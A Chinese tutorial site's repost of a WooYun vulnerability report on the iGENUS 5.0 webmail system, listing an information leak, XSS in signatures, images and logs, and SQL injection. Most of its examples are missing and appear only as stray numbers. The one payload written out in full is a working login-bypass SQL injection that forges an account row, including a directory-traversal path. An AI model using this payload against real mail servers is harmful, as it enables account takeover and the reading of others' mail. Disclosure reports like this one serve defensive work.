网站地图    收藏   

主页 > 后端 > 网站安全 >

iGENUS5.0邮件系统的一些漏洞打包(注射及登陆等

来源:自学PHP网    时间:2015-04-16 23:14 作者: 阅读:

[导读] 没事的时候下载了iGENUS5 0来看了看,时间紧,只看了个大概。大量政府、学校、科研机构、大型公司在使用这套系统。先说下我使用的版本和环境:整套程序,没有防注入措施,除邮件...

 没事的时候下载了iGENUS5.0来看了看,时间紧,只看了个大概。大量政府、学校、科研机构、大型公司在使用这套系统。

先说下我使用的版本和环境:

1

2 3

整套程序,没有防注入措施,除邮件标题和外没有放XSS错误,导致漏洞一大堆,以下测试均在魔术引号关闭的情况下进行(php5.4以后魔术引号就默认关闭了)

1、信息泄露(开发者用于调试的功能):

1 2

2、各种xss:

反射性:

12

 

 

发送邮件时,邮件中插入图片,图片地址和描述存在xss:

1

邮件签名xss:

1

1

系统日志xss可以x管理员(域管理员和系统管理员),还可以csrf(大家自己去试):

1 2

3、注入存在性:

12

 

 

4、登陆框SQL注入导致登陆任意存在的账户,或者登陆自己的账户查看别人的邮件(iGENUS的邮件存放在文件夹中):

登陆框输入:

baidu' and 1=2 union select 9999,'baidu','mydomains.com','$1$cKT9CGj7$svBg/NeQckI2rvfm2GWc40',0,0,'','/home/vpopmail/domains/mydomains.com/baidu','104857600S','1','2013-12-31 16:39:38','2015-12-31 00:00:00',1,1048,10,'/home/netdisk/mydomains.com/../',0,1048,0,1,0,0 from vpopmail where 'a'='a 123

本文由clzzy原创,首发乌云http://www.wooyun.org/bugs/wooyun-2014-047768

 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论